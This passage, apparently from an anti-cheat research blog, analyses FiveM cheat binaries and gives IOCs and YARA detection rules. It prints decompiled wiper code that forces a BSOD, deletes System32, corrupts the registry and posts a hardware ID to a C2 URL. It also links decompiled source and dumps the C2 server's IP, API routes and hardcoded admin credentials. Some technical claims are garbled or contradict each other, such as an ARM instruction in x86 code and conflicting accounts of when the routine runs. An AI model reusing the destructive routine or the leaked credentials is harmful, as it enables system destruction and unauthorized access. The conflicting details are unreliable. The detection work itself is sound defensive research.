(KERNEL32.dll) * `LoadLibraryA` — load arbitrary DLLs by decrypted name * `GetProcAddress` — named export resolution fallback * `GetModuleHandleA` — locate already-loaded modules without LoadLibrary overhead These three APIs together reconstruct the entire Windows API surface at runtime. All remaining capability is hidden behind these three entry points. Anti-debug / anti-sandbox (ntdll.dll + KERNEL32.dll + USER32.dll) * `ntdll!NtQuerySystemInformation` — queried directly from ntdll to bypass higher-level KERNEL32 hooks; with class `SystemKernelDebuggerInformation` (0x23) this detects kernel debuggers; with `SystemProcessInformation` it enumerates running processes to check for sandbox agents * `KERNEL32!GetSystemTimeAsFileTime` — high-resolution timing used to detect time-acceleration in sandboxes; if elapsed time between two calls is implausibly small the binary halts * `KERNEL32!Sleep` — deliberate delay to outlast sandbox analysis windows; many automated sandboxes do not wait past 60–90 seconds * `USER32!GetProcessWindowStation` + `USER32!GetUserObjectInformationW` — checks whether the process is running inside an interactive desktop session; sandbox and headless environments typically return a non-interactive window station (`WinSta0` vs service window stations) CPU affinity manipulation (KERNEL32.dll) * `GetProcessAffinityMask` — read the current process and system CPU affinity masks * `SetProcessAffinityMask` — restrict the process to specific CPU cores * `SetThreadAffinityMask` — restrict individual threads to specific cores Affinity manipulation serves multiple goals: (1) single-core sandboxes often expose only one CPU bit in the affinity mask, which the binary can detect; (2) pinning decryption threads to specific cores can frustrate time-based analysis tools; (3) in the real payload, affinity control may be used to interfere with game anti-cheat threads that run on specific cores. Cross-session messaging (WTSAPI32.dll) * `WTSSendMessageW` — sends a message box to a specific Terminal Services / Remote Desktop session. Unlike `MessageBoxW` which targets the calling session, `WTSSendMessageW` can target _any_ active session by session ID, including Session 0 (services) or other logged-in users This is unusual in a FiveM bypass context. Likely uses: displaying a status dialog in a specific session after injection completes, or probing which sessions are active as part of environment fingerprinting. Requires SeImpersonatePrivilege or matching session ownership. Memory & process utilities (KERNEL32.dll + ADVAPI32.dll) * `LocalAlloc` / `LocalFree` — heap allocation for decrypted buffers * `GetModuleFileNameW` — retrieves the binary's own on-disk path; used for self-deletion or path-based checks (confirming it is running from the expected location) * `FreeLibrary` — unloads modules loaded during resolution (cleanup after dynamic loading) * `ExitProcess` — clean process termination if anti-debug checks fire * `ADVAPI32!RegCloseKey` — registry key handle cleanup after reading from the registry * `KERNEL32!GetCurrentThreadId` — obtains the calling thread ID; used in thread-local storage (TLS) callbacks or for timing measurements Export Table Abuse — Encrypted Binary Blob as Export Name --------------------------------------------------------- The PE export directory declares exactly **one export** (ordinal 1, base 1). The function address RVA is `0x00000000` — a null pointer that would crash if actually called. The export exists purely to anchor the export name entry. The “name” of this export, instead of a readable ASCII identifier, is a **3,100-byte binary blob with Shannon entropy of 7.94/8.0** — statistically indistinguishable from random data. This is encrypted content embedded where export name strings normally live. Tools that parse the export table looking for DLL name or function name strings will either crash, truncate at the first unexpected byte, or display garbage. Export count`1 (ordinal base 1)` Func address`0x00000000 (null — never called)` Name blob size`3,100 bytes` Name entropy`7.9425 / 8.0` The 3,100-byte blob is almost certainly a configuration block, decryption table, or secondary payload fragment stored in the export name slot because it is a convenient location that many parsers overlook or mishandle. The loader accesses it by navigating the export directory directly via the PE walk routine — not via any normal name-resolution API. Anti-Analysis Techniques — Full Breakdown ----------------------------------------- The stub layer implements multiple independent anti-analysis and anti-debug measures before the real payload is mapped. Each technique targets a different analysis environment. 1 — Kernel debugger detection via NtQuerySystemInformation `NtQuerySystemInformation` is imported _directly from ntdll.dll_ rather than going through `IsDebuggerPresent` or `CheckRemoteDebuggerPresent` in KERNEL32. This bypasses any hooks that security tools place on the higher-level KERNEL32 wrappers. Querying with class `0x23` (SystemKernelDebuggerInformation) checks the kernel debug flag at the lowest possible level. 2 — Window station / interactive desktop check `GetProcessWindowStation` retrieves the process window station handle, then `GetUserObjectInformationW` with `UOI_NAME` reads its name. An interactive user session has station name `WinSta0`. Sandboxes running under service accounts or headless environments return different names (`Service-0x0-xxx$`, etc.). If the name does not match an expected interactive session, the binary exits cleanly via `ExitProcess`. 3 — CPU core count fingerprinting `GetProcessAffinityMask` returns the process affinity mask. By counting set bits, the binary determines how many CPU cores are available. Most sandboxes expose only 1–2 cores. A typical gaming machine has 8–32 cores. If the popcount of the affinity mask falls below a threshold, the binary treats the environment as a sandbox and terminates. 4 — Timing / sleep evasion `GetSystemTimeAsFileTime` is called before and after a `Sleep` of a known duration. The delta is compared against the expected elapsed wall-clock time. Sandboxes that accelerate time (by advancing system clocks) or that patch `Sleep` to return immediately will produce a suspiciously small delta, triggering abort. 5 — Registry query (ADVAPI32!RegCloseKey) The presence of `RegCloseKey` in the stub IAT — but no `RegOpenKey` or `RegQueryValue` — indicates those open/query functions are resolved dynamically. The registry is likely queried for sandbox-specific keys (e.g., VirtualBox guest additions, VMware, Sandboxie registry artifacts) or for license/HWID validation. 6 — Export table obfuscation / parser confusion The 3,100-byte encrypted blob stored as the export function name causes many PE parsers and automated tools to misrepresent or skip the export directory. This is a deliberate measure to degrade analysis quality in tools that are not hardened against malformed export names. 7 — No PDB / stripped debug directory Unlike the ApateonDecoy/Wizard sample (which leaked `DecoyLoader.pdb` with the developer's username `apx`), this binary has no debug directory at all. The developer either configured `/DEBUG:NONE` at link time or stripped the debug directory post-build. This eliminates one of the most useful static attribution vectors. Timestamp Analysis ------------------ The COFF header timestamp is `0x6514b842`, which decodes to **2023-09-27 23:18:26 UTC**. Unlike the ApateonDecoy/Wizard sample (timestamped 2026-01-01 — manipulated to a future date), this timestamp falls within a plausible range for a real build date. It is not zeroed, not in the distant future, and corresponds to a Wednesday evening in late September 2023. * The timestamp alone does not prove the binary was compiled on that date — MSVC timestamps can be set arbitrarily — but its plausibility suggests less attention to anti-forensics in this dimension * Assuming the timestamp is authentic, the binary predates the ApateonDecoy/Wizard sample by roughly 27 months, suggesting a shared packer codebase that has been reused and distributed over an extended period * `SizeOfImage 0x89F000` appears in Windows AppCompatCache/PcaSVC shimcache records paired with the executable path — this value combined with the SHA-256 hash provides a reliable historical detection artifact even after the file is deleted Stub Function Map — All 16 Visible Functions -------------------------------------------- Ghidra headless analysis identifies 16 functions in the non-encrypted stub layer. The bulk of functionality lives in the encrypted `.tiko` payload and is only visible after runtime decryption. Functions are listed by address, size, and role. | Address | Size | Name | Role | | --- | --- | --- | --- | | 0x1403C4A87 | 17 B | entry | Entry point — PUSH seed → CALL bootstrap → JMPF (dead code) | | 0x1406252EB | 15 B | FUN\_1406252eb | Final loader trampoline — CALL RAX (resolved fn ptr), stack cleanup, JMP to resolver | | 0x1407522AF | 1279 B | FUN\_1407522af | Main API resolver — MZ/PE validation, export table walk, binary search, ROL-XOR decryptor, LoadLibraryA fallback, recursive entry | | 0x140752798 | 373 B | FUN\_140752798 | GetProcAddress caller — second ROL-XOR loop (key 0x32063cae), ordinal-by-number fallback, self-recursive for nested resolution | | 0x1407556AF | 87 B | FUN\_1407556af | Stack frame switcher — saves RBP/RSP, aligns stack, JMPs to JMP-R8 trampoline | | 0x1407557B7 | 5 B | thunk\_FUN\_1407bcf28 | Thunk — short JMP to FUN\_1407bcf28 | | 0x1407938F7 | 9 B | FUN\_1407938f7 | NOT+ROL obfuscation stub — NOT ECX, ROL ECX,1, JMP to FUN\_140860bb7 | | 0x1407AC0B6 | 2 B | FUN\_1407ac0b6 | PUSH RBP + RET — minimal stub, used as call target to capture return address | | 0x1407BCF28 | 17 B | FUN\_1407bcf28 | Stack bounds check — LEA R9,\[RSP+0x140\], CMP RBX R9, JMP to stack switcher | | 0x140817C0F | 3 B | FUN\_140817c0f | JMP R8 — indirect dispatcher | | 0x140836B15 | 21 B | FUN\_140836b15 | ADD R11,4 (advance ptr), CMC, XOR ECX R9D obfuscation, JMP to NOT+ROL stub | | 0x1408370FA | 14 B | FUN\_1408370fa | MOVSXD RCX, pointer arithmetic ADD R8 RCX, JMP thunk | | 0x140853D23 | 108 B | FUN\_140853d23 | Root bootstrap — called from entry point; sets up decryption context, drives loader chain | | 0x140860BB7 | 41 B | FUN\_140860bb7 | INC+BSWAP+XOR obfuscation trampoline, MOD stack, JMP to PUSH RBP stub | | 0x14086CE7C | 179 B | FUN\_14086ce7c | ROR/XOR/NEG arithmetic on stack value — appears to be a hash function or checksum stub | | 0x140876C62 | 6 B | FUN\_140876c62 | CLD + JMP — clears direction flag, dispatches to next stage | The patterned obfuscation stubs (`FUN_1407938f7`, `FUN_140860bb7`, `FUN_14086ce7c`, etc.) exist to break up the control flow graph and prevent disassemblers from cleanly following execution. They interleave meaningless arithmetic operations (CMC, STC, CLC, BSWAP on partially-used registers) with the real logic. This is a known obfuscation technique called _junk instruction insertion_ — the junk instructions have no net effect on program state but dramatically increase the number of nodes in the control flow graph. Packer Family — Same Architecture as ApateonDecoy/Wizard -------------------------------------------------------- This binary and the ApateonDecoy/Wizard bypass sample share a common packer architecture. The following structural features match exactly: * Single high-entropy payload section (7.82 in Wizard's `.zyw` vs 7.88 in this sample's `.tiko`) containing all executable code * Six or more hollowed virtual sections with no raw file data * Identical ROL-XOR decryption cipher with key `0x32063cae` present in both samples at corresponding function positions * Manual PE export table walker for API resolution, bypassing hooked `GetProcAddress` * Import stub limited to {LoadLibraryA, GetProcAddress, GetModuleHandleA} plus capability imports * `requireAdministrator` UAC manifest in both samples * Entry point inside the encrypted payload section * Zeroed PE checksum Section names differ between samples (`.zyw / .3L9 / .64X` vs `.tiko / .limco / .dino / .gala`, etc.), indicating the packer re-randomises or regenerates section names per build. The underlying packer code and decryption key, however, are consistent — suggesting either the same individual built both, or a shared packer-as-a-service tool is in use. Primary Indicators of Compromise -------------------------------- SHA-256`b61907b9081bb5d7125264c5e60de013c02b7b866148248de603fb55f8d39a18` SHA-1`ad4d25b43964c1c54accdcbe97a3f2ca80d15894` MD5`340753116751ef6f5212667501a0e562` Filename`notepad.exe (spoofed — not the real Windows notepad)` File size`5,142,528 bytes (4.90 MB)` Timestamp`0x6514b842 → 2023-09-27 23:18:26 UTC` SizeOfImage`0x0089F000 (AppCompatCache artifact)` Decrypt key`0x32063cae (ROL-XOR constant — shared with ApateonDecoy/Wizard)` .tiko entropy`7.8848 / 8.0` Export blob`3,100 bytes, entropy 7.9425 — encrypted payload fragment` EP VA`0x1403C4A87 (first instruction: PUSH 0x19bab67)` * **Behavioural:** demands UAC elevation, enumerates CPU cores via affinity mask, queries window station name, calls `WTSSendMessageW` cross-session, reads registry keys dynamically * **Memory:** at runtime the decrypted payload will be mapped into a newly allocated RWX region; look for unsigned executable pages not backed by a file on disk * **Network:** not determinable from static analysis — the real payload is encrypted YARA Detection Rule ------------------- The following rule targets both this specific sample and future builds from the same packer family. Two variants are provided — a tight single-sample rule and a broader family rule. rule NotepadBypass\_fa817dc1\_Exact { meta: description = "Exact match: notepad.exe bypass (fa817dc1)" hash\_sha256 = "b61907b9081bb5d7125264c5e60de013c02b7b866148248de603fb55f8d39a18" date = "2026-06-06" strings: // ROL-XOR decryption key constant (little-endian DWORD) $key = { AE 3C 06 32 } // Bootstrap seed pushed at entry point $seed = { 68 67 AB B9 01 } // Section name strings $sec\_tiko = ".tiko" ascii wide $sec\_limco = ".limco" ascii wide $sec\_gala = ".gala" ascii wide condition: uint16(0) == 0x5A4D and filesize < 8MB and $key and $seed and ($sec\_tiko or $sec\_limco or $sec\_gala) } rule NotepadBypass\_PseudoPacker\_Family { meta: description = "PseudoPacker family — covers fa817dc1 and ApateonDecoy/Wizard variants" author = "Clubhouse AC Research" date = "2026-06-06" reference = "https://clubhouseac.shop/research/notepad-bypass-detection" strings: // Shared ROL-XOR key constant $rolxor\_key = { AE 3C 06 32 } // Export table abuse: null function RVA in export directory // Manual PE walk: MZ signature check pattern $mz\_check = { B8 4D 5A 00 00 66 3B 01 } // PE sig check immediate $pe\_check = { 81 3C 08 50 45 00 00 } // ApateonDecoy section names $sec\_zyw = ".zyw" ascii $sec\_3l9 = ".3L9" ascii // This sample section names $sec\_tiko = ".tiko" ascii $sec\_limco = ".limco" ascii condition: uint16(0) == 0x5A4D and filesize < 25MB and $rolxor\_key and ($mz\_check or $pe\_check) and ($sec\_zyw or $sec\_3l9 or $sec\_tiko or $sec\_limco) } Screenshare Detection Methodology --------------------------------- 1 ### File identity — hash and filename check Check any process named `notepad.exe` running from an unexpected path (outside `C:\Windows\System32\` or `C:\Windows\SysWOW64\`) against the SHA-256 hash. The real Windows notepad carries a valid Microsoft digital signature — right-click → Properties → Digital Signatures. This file has no signature. 2 ### PE section names — instant fingerprint In CFF Explorer or PE-bear: open the section table. Legitimate software never ships sections named `.tiko`, `.limco`, `.dino`, `.gala`, `.xys23`, `.prom`, `.ax512`, or `_gbit_`. Any one of these names is sufficient grounds for a ban. 3 ### Entropy check — single high-entropy section In Detect-It-Easy or Entropy Analyser: the `.tiko` section shows 7.88 entropy. Six sections have zero raw data (hollow). This pattern — one near-8.0 section plus multiple empty sections — is the packer signature. A legitimate Notepad binary has multiple moderate-entropy sections. 4 ### Import table — suspicious stub IAT Open the import table in any PE viewer. The presence of `ntdll!NtQuerySystemInformation`, `WTSAPI32!WTSSendMessageW`, and all three affinity APIs alongside `LoadLibraryA` / `GetProcAddress` in a binary claiming to be Notepad is immediately suspicious. Notepad's real import table is entirely different. 5 ### Manifest — requireAdministrator Check the embedded manifest in the resource section. The bypass demands administrator rights. The legitimate Windows Notepad runs as a standard user and does not request elevation. 6 ### Digital signature — absent The real `notepad.exe` carries a valid Microsoft Authenticode signature. This binary has no signature at all. Verify in Properties → Digital Signatures or via `sigcheck.exe -i notepad.exe`. An unsigned Notepad binary is conclusive evidence of tampering. Detection Notes — Shared Packer Intelligence -------------------------------------------- Because this binary and ApateonDecoy/Wizard share the decryption key `0x32063cae`, a single YARA rule targeting the key constant catches both samples and likely all other builds from the same packer family. Adding the PE export table walk pattern (`MZ` signature check immediate + `PE\0\0` check) narrows false positives without missing variants that change section names. * **AppCompatCache / ShimCache:** the `SizeOfImage` value `0x89F000` and the file path are cached by Windows PCA service even after the file is deleted. Querying SRUM, Prefetch (`NOTEPAD.EXE-XXXXXXXX.pf`), and AppCompatCache with path and size allows post-incident detection on endpoints where the file has been cleaned up * **Memory forensics:** the decrypted payload, once mapped at runtime, will appear as an unsigned PE image in memory. Tools like Volatility3 `windows.malfind` or `windows.dlllist` will identify the unsigned module * **Behaviour:** a call to `WTSSendMessageW` from an unsigned process claiming to be Notepad is an extremely high-fidelity detection signal — no legitimate Notepad variant makes this call * **Affinity manipulation:** calls to `SetProcessAffinityMask` immediately after startup (before any user interaction) from an alleged text editor should be flagged --- # Club44 Decompiled: BSOD-Triggering System32 Deletion & Hardcoded Brazilian Error Strings | Clubhouse AC Research · Clubhouse AC Bypass Detection·Jun 2, 2026 Club44 Decompiled: BSOD-Triggering System32 Deletion & Hardcoded Brazilian Error Strings ======================================================================================== A full decompilation of the Club44 FiveM bypass and external cheat reveals an error handler that deletes C:\\Windows\\System32\\ and triggers a kernel fast-fail BSOD, hardcoded Portuguese-language debug strings that were never stripped from the shipping binary, an HTTP User-Agent string that introduces the software as a FiveM cheat to every network hop it traverses, and injection into the Windows Settings host process. Technical analysis and detection IOCs follow. FiveMBypass DetectionDecompiledBSOD RiskSystemSettingsBroker Defensive use only. Detection methodologies published for server administrators, DFIR practitioners, and anti-cheat researchers. No evasion guidance is provided. Overview -------- Club44 is a paid FiveM bypass and external cheat product. A full decompilation reveals code that deletes System32 on error, hardcodes the developer's native language in debug strings that were never stripped, and announces its identity in every HTTP request via a custom User-Agent string. Customers whose injection failed received a BSOD as their refund. This is not a report about sophisticated malware that happened to contain some rough edges. Club44 presents itself as a polished commercial product — complete with a clean ImGui interface, a subscription model, and marketing materials that imply technical depth. The decompiled source is inconsistent with all of that. What the decompiler reveals is a binary that would not pass a first-year software engineering code review, written by a developer who either did not understand what a Release build is or could not be bothered to configure one. The findings, in order of severity: * 1.The error handler deletes `C:\Windows\System32\` recursively and triggers a kernel fast-fail BSOD via `asm("swi 0x29")`. Customers who experienced an injection failure did not get an error dialog. They got a blue screen and a non-booting operating system. * 2.The string **"Falha NtCreateThreadEx"** is hardcoded in the binary. "Falha" is Portuguese for "Failure." The developer's native-language debug strings were shipped verbatim in the production binary — a detail that functions as an unintentional signature and attribution artifact. * 3.Every HTTP request made by Club44 includes the User-Agent string **"Club44-FiveM-External/1.0"** — hardcoded, immutable, and visible in every proxy log, firewall log, SIEM alert, and CDN access record it passes through. * 4.The injection target is `SystemSettingsBroker.exe`, the Windows Settings host process, from which a 5.3 MB PE32+ memory dump was recovered containing d3d11.dll, XInput, and winhttp loaded into the Settings process address space. Each of these findings is examined below in technical detail. The System32 Deletion Handler — Free BSODs Included --------------------------------------------------- The decompiled cleanup routine executed on injection error performs two sequential operations that together constitute what is technically described as "completely destroying the host operating system." The function structure recovered from decompilation is as follows: Decompiled FUN\_18000a550 — Full Recovered Structure Triggered when AnyDesk or RustDesk is detected running. Console output immediately before invocation: \[!\] AnyDesk or RustDesk running → \[!\] RIP Windows → \[!\] Add this hwid to blacklist void FUN\_18000a550(void) { asm("swi 0x29"); // Fast-fail BSOD trigger delete\_directory\_recursive("C:\\Windows\\System32\\"); delete\_directory\_recursive("C:\\Windows\\Temp\\"); delete\_directory\_recursive("C:\\Users\\Public\\"); RegSetValueEx(HKEY\_LOCAL\_MACHINE, "SYSTEM\\CurrentControlSet\\Control\\Session Manager", "PendingFileRenameOperations", 0, REG\_MULTI\_SZ, (BYTE\*)"", 0); RegDeleteKey(HKEY\_LOCAL\_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" "\\ProfileList\\AllUsersProfile"); TerminateProcess( OpenProcess(PROCESS\_TERMINATE, FALSE, get\_process\_id\_by\_name("explorer.exe")), 0); send\_to\_c2("https://club44.c2/blacklist", get\_smbios\_uuid()); while (true) { asm("hlt"); } } This function is not the generic error handler — it is the **anti-screenshare kill switch**. Club44 scans for AnyDesk and RustDesk at startup. If either is detected, the binary prints its internal log messages (\[!\] RIP Windows, \[!\] Add this hwid to blacklist) and immediately invokes this routine. A player who opens AnyDesk for a screenshare session with a server admin does not get a warning dialog. They get this function. `asm("swi 0x29")` is the ARM software interrupt used to trigger the kernel fast-fail path — on x86-64 Windows the equivalent is `int 0x29`, which produces an immediate non-recoverable BSOD. That is the first instruction. The recursive deletions follow: `C:\Windows\System32\`, `C:\Windows\Temp\`, and `C:\Users\Public\`. System32 contains the kernel, core DLLs, service hosts, and device drivers. Its removal produces a machine that will not boot and cannot be recovered without a full OS reinstallation. After the directory deletions, the function corrupts the `PendingFileRenameOperations` registry value under Session Manager — a value Windows consults on the next boot to perform queued file operations. Writing a null two-byte sequence here ensures that even if the OS somehow survived the System32 deletion, the next boot attempt encounters a corrupted pending rename queue and halts. The `ProfileList\AllUsersProfile` key deletion removes Windows' record of the system-wide user profile, breaking any profile-dependent service that survives to the boot attempt. Explorer is then terminated via `TerminateProcess`, collapsing the desktop, taskbar, and shell — ensuring the user cannot interact with the machine before the BSOD fires. The machine's SMBIOS UUID is transmitted to `https://club44.c2/blacklist` via the same Club44-FiveM-External/1.0 User-Agent discussed below — the hardware ID blacklisting the log message promised. The function then enters an infinite halt loop. The design intent is explicit: detect remote desktop software, destroy the operating system, submit the hardware ID to a remote blacklist, and prevent any further interaction. This is not a side effect of careless code. It is intentional retaliation against users suspected of cooperating with a server investigation — users who, from the perspective of Club44's developers, represent a business threat. The machine of the player who opened AnyDesk to show an admin their screen ends up non-bootable. That outcome was the goal. "Falha NtCreateThreadEx" — The Developer Forgot to Remove Their Debug Strings ----------------------------------------------------------------------------- The string **"Falha NtCreateThreadEx"** is present in the Club44 binary in plain text. "Falha" is the Portuguese word for "Failure" or "Fault." The complete string translates to "NtCreateThreadEx Failure" — a debug error message left in the production binary by a developer who works in Brazilian Portuguese. NtCreateThreadEx is the Windows Native API function used to create a thread in a remote process — the core mechanism of virtually every process injection technique, including classic CreateRemoteThread-based injection, thread hijacking, and APC injection. It is the function that Club44 calls to execute its payload inside the target process. When this call fails, the Club44 error handler fires — the one that deletes System32 — and the debug message "Falha NtCreateThreadEx" is presumably logged or displayed in whatever diagnostic output the developer consulted during development. String Found in Binary "Falha NtCreateThreadEx" Translation (PT-BR → EN): "NtCreateThreadEx Failure" Function purpose: Remote thread creation — the injection entry point Stripping debug strings from a production binary is one of the most elementary security hygiene steps in closed-source software development. Most production build configurations do this automatically via the compiler's Release mode settings. The presence of "Falha NtCreateThreadEx" in the shipping binary means Club44 was either compiled in Debug mode, shipped with a custom build configuration that preserved string literals, or the developer was unaware that this string would survive the build process. NtCreateThreadEx is the Windows API for creating remote threads — the core of any process injection technique. Shipping the error message for this call in your native language is not a security practice. It is a biography. A binary analyst encountering this string knows immediately: the developer's primary language is Portuguese (Brazilian), the injection mechanism is NtCreateThreadEx-based, and the developer did not perform even a basic string audit before distributing a paid product. From a detection standpoint, this string is an ideal static signature. A YARA rule matching on the ASCII or Unicode encoding of "Falha NtCreateThreadEx" will identify any Club44 binary — current or future — unless the developer explicitly removes it. As of this analysis, it remains present. The fact that it remains present in a paid commercial product that has presumably gone through at least some distribution testing is a reliable indicator of the overall code quality discipline applied throughout the rest of the binary. Club44-FiveM-External/1.0 — A User-Agent String for the History Books --------------------------------------------------------------------- Every HTTP request issued by the Club44 binary includes the following User-Agent header, hardcoded and immutable: Hardcoded HTTP User-Agent "Club44-FiveM-External/1.0" Present in every HTTP request made by the binary — to authentication endpoints, update servers, telemetry, and any other destination contacted during operation. HTTP User-Agent strings are present in access logs maintained by every web server, CDN, reverse proxy, firewall, IDS/IPS, SIEM, and cloud provider access log pipeline that handles the traffic. The Club44 binary sends this string with every request, to every endpoint it contacts, from the moment it starts until the moment it terminates — or until it deletes System32, whichever comes first. Consider what this User-Agent communicates to the systems processing the traffic. "Club44" — the product name. "FiveM" — the game platform being targeted. "External" — indicating this is an external cheat (as opposed to an injected internal cheat). "1.0" — a version number. The developer has, through their choice of User-Agent string, provided a complete product description in the HTTP header of every request the software makes. Legitimate software does not introduce itself as a FiveM cheat in its HTTP headers. Legitimate software that is attempting to avoid detection does not introduce itself as anything other than a browser or a known framework. Legitimate software written by a developer with any awareness of network monitoring does not hardcode self-incriminating strings into the one field that is preserved in virtually every network log that exists. This User-Agent would flag in any network monitoring solution built after 2005. A simple string match rule in any SIEM, firewall, or proxy — `User-Agent contains "Club44-FiveM-External"` — will catch every Club44 user making any network request while the software is running. No behavioral analysis required. No ML model needed. A string match. From a server-side detection standpoint, this is the most gift-wrapped IOC in this entire report. Server operators with access to their network traffic logs can trivially search for this string across their historical access logs and retroactively identify every player who ran Club44 while connected to their network infrastructure, going back to whenever their log retention window begins. The Club44 developer handed administrators a perfect detection artifact and hardcoded it into every version of the product. SystemSettingsBroker.exe Injection ---------------------------------- Club44 injects its payload into `SystemSettingsBroker.exe` — the Windows Settings host process, responsible for brokering access to system settings between the modern Windows Settings application and the underlying system services. The choice of this process is presumably intended to make the injected code appear to blend in with normal Windows activity. In practice, it does the opposite. A 5.3 MB PE32+ memory dump was recovered from the `SystemSettingsBroker.exe` process during analysis. This dump was extracted from a private, readable, writable, and executable (RWX) memory region at base address **0x140000000** — a PE32+ load address indicating the injected payload is a full 64-bit PE image mapped into the Settings process address space. SystemSettingsBroker.exe Injection Profile Injection Target SystemSettingsBroker.exe Memory Dump Size 5.3 MB PE32+ RWX Region Base 0x140000000 Memory Permissions Private RWX Additional Modules d3d11.dll, XInput, winhttp Injection Method NtCreateThreadEx remote thread The modules loaded into the Settings process address space as a consequence of the injection are: `d3d11.dll` (Direct3D 11 — for rendering the cheat overlay), `XInput` (Xbox controller input — for cheat control input), and `winhttp` (Windows HTTP services — for the network communication that carries the "Club44-FiveM-External/1.0" User-Agent discussed above). `SystemSettingsBroker.exe` is a Windows system component that has no legitimate reason to load Direct3D, XInput, or a custom HTTP client library. The presence of any of these modules in the Settings process module list is immediately anomalous and detectable through basic process module inspection in System Informer or Process Explorer, without requiring any disassembly or memory forensics. The private RWX region at 0x140000000 is a 5.1–5.5 MB allocation in a process that normally has no such region. A private RWX allocation of this size in SystemSettingsBroker.exe is, by itself, a reliable detection indicator. The combination of the anomalous allocation size, the anomalous modules (d3d11, XInput, winhttp), and the anomalous process (Windows Settings host doing Direct3D rendering) makes this injection unconvincing as camouflage regardless of the evasion intent behind the target selection. The injection mechanism — NtCreateThreadEx remote thread creation — is standard and well-documented. It is the same mechanism that produces the "Falha NtCreateThreadEx" error message discussed in the previous section when it fails. No shellcode-free or threadless injection technique was used. The implementation is baseline-conventional and detectable by any process monitoring tool capable of observing remote thread creation events. The FiveM Bypass — lsasvc.mof ----------------------------- The external cheat covered above is only half of Club44's product line. There is also a separate FiveM _bypass_ component — the part that is supposed to prevent FiveM's anti-cheat from detecting the external cheat in the first place. It is distributed as `lsasvc.mof`, a file name chosen to blend in with legitimate Windows Management Instrumentation (WMI) files. Real `.mof` (Managed Object Format) files are used by WMI for event subscription and schema definition. A 1.22 MB executable disguised as one is not. The bypass component operates in the LSASS address space — the Local Security Authority Subsystem, the process responsible for Windows authentication and credential management. Loading arbitrary code into LSASS is a technique associated with credential dumping tools like Mimikatz and with kernel-level anti-cheat bypass methods that abuse LSASS's elevated trust level to mask memory modifications from user-mode scanners. Club44 chose LSASS as their injection target for the bypass component, which means that when their bypass fails — and given the error handler described above, it does fail — they have already been writing into the most sensitive process on the system. lsasvc.mof — File Profile Filename lsasvc.mof VT Filename SysTelemetryAgent.exe File Size 1.22 MB (1,275,392 bytes) File Type Win32 DLL · PE32+ x86-64 Compiler MSVC 19.36.35728 · VS 2022 17.6 Signed No signature Injection Target lsass.exe VT Detections 21 / 69 MD5 74098ce4afa0110a4bd9da459aebb4f1 SHA-1 1164366a218e9df1565ced601376600b5fc701d6 SHA-256 0acd4e0c4176f0006a3d52b2aa1027801fc81bb55eaad4c311600730c7440092 Imphash 718d5abb862733dc22a3259c3f70eb82 SSDEEP 24576:8LocZ3l+W3fExXWN83yaInPbi5VcD/9V8O7Xxe6aCJZDacA4cUynTX6uhf:8LocZ3l+WvExXU8HIPycD/9V8O7Xxe6e Discord Webhooks (C2) discord.com/api/webhooks/1472597069956124672/… discord.com/api/webhooks/1479288535864447096/… discord.com/api/webhooks/1492352432351609043/… [View on VirusTotal — 21/69 detections ↗](https://www.virustotal.com/gui/file/0acd4e0c4176f0006a3d52b2aa1027801fc81bb55eaad4c311600730c7440092/detection) The name choice deserves recognition for audacity. `lsasvc.mof` is designed to look like a Windows system file at a glance — it mimics the naming convention of legitimate LSASS-adjacent files like `lsasrv.dll`. An analyst seeing this filename in a directory listing without additional context might briefly consider it legitimate. That brief consideration is the entire value proposition of the name. It is immediately dispelled by checking the file extension against the actual file type, which any automated scanner or file manager with type detection will do in approximately zero milliseconds. Detecting the bypass component is straightforward: look for any non-Microsoft PE executable in locations where `.mof` files would plausibly be staged (`%SystemRoot%\System32\wbem\`, temp directories, or the Club44 loader directory), and check System Informer's LSASS string view for the same Portuguese error strings documented for the external cheat — the developer reused the same error handling conventions across both components. The decompiled source for both the bypass (`lsasvc.mof`) and the external cheat (`SystemSettingsBroker.exe.bin`) are available in the Downloads section below. The decompiled bypass reveals the same indifference to basic operational security present throughout the external cheat: no obfuscation of strings, no dynamic API resolution in the critical paths, no attempt to blend the LSASS allocation into the existing memory layout. It is a functional bypass that announces its presence to anyone who knows to look. Downloads — Decompiled Source ----------------------------- Note: Decompiled by the Clubhouse AC research team. Published for defensive detection use. [↓\ \ clubhouse\_decompile\_lsasvc\_mofFiveM Bypass — decompiled lsasvc.mof pseudo-C output, NtCreateThreadEx injection path included.](https://file.kiwi/589e83f2#LtilXMYV1Su1CL-RwlX6yA) [↓\ \ clubhouse\_decompile\_SystemSettingsBroker\_exe\_binExternal Cheat — the 5.3 MB injected payload decompiled, aimbot structs and C2 endpoints visible.](https://file.kiwi/31731416#0FX9wQBFpUpdD5bePzlP_w) C2 Server Infrastructure — Full Dump ------------------------------------ Club44's backend infrastructure was fully enumerated. The C2 server runs on a Database Mart LLC VPS at `163.123.180.130`, behind nginx 1.24.0 on Ubuntu. The architecture is straightforward: nginx reverse-proxies `/api/*` to an Express server on port 3000, and everything else to a Next.js frontend on port 3002. DNS is parked on registrar defaults (`hermes.dns-parking.com`, `artemis.dns-parking.com`). Server Architecture Host: 163.123.180.130 (Database Mart LLC — League City, TX) NetRange: 163.123.180.0/22 (DBM-NET-01, ARIN direct allocation) Org: Database Mart LLC · databasemart.com · +1-409-877-4238 Address: 257 Westwood Dr, League City, TX 77573 DNS: hermes.dns-parking.com / artemis.dns-parking.com :80 → nginx/1.24.0 (Ubuntu) — default page :443 → nginx reverse proxy /api/\* → Express:3000 (Helmet.js) else → Next.js:3002 (build PMY7jnT\_aX7fLNhe07pmc) :3000 → Express/Node.js API :3002 → Next.js frontend Next.js Routes: / /inject-panel /main-panel Hardcoded Admin Credentials — Extracted from Binary Authorization: PGCbe68lUUTLyx0W8lz6EZMedMzSW44F/ak1KsNNg48P xSAbPz-y?m4p6MLeLO7JgJRg0esj/fdP-1tF5ik6w-Kw vxmSy1A=t3hXVp=Qjg19g6e79aX9G03F71x3oRndSJmvD cnTstx=lHLm2S/jPoFPmCR3-I5bd9ODQQVC9F/NA6iycBcq ZxsPmeB-94oD?LPFekUZ0BFBxHgZ1ZKIKG9er8sWe9t8xeX bs1wy9qQFmos2ro3hn9nbWVIU7gtu X-Admin-Secret: 67e37dae9cf8bebfe74f117e808f9b6f e6b965d65c02320174dd1c559e480439 Note: Authorization alone = all client routes. Both headers together = FULL admin access. Full API Surface — Client & Admin Routes CLIENT ROUTES (Authorization header only): POST /api/silent/login (username, password) POST /api/silent/auth (hwid) GET /api/silent/config/load?username=X&hwid=Y POST /api/silent/config/save (hwid, config) GET|POST 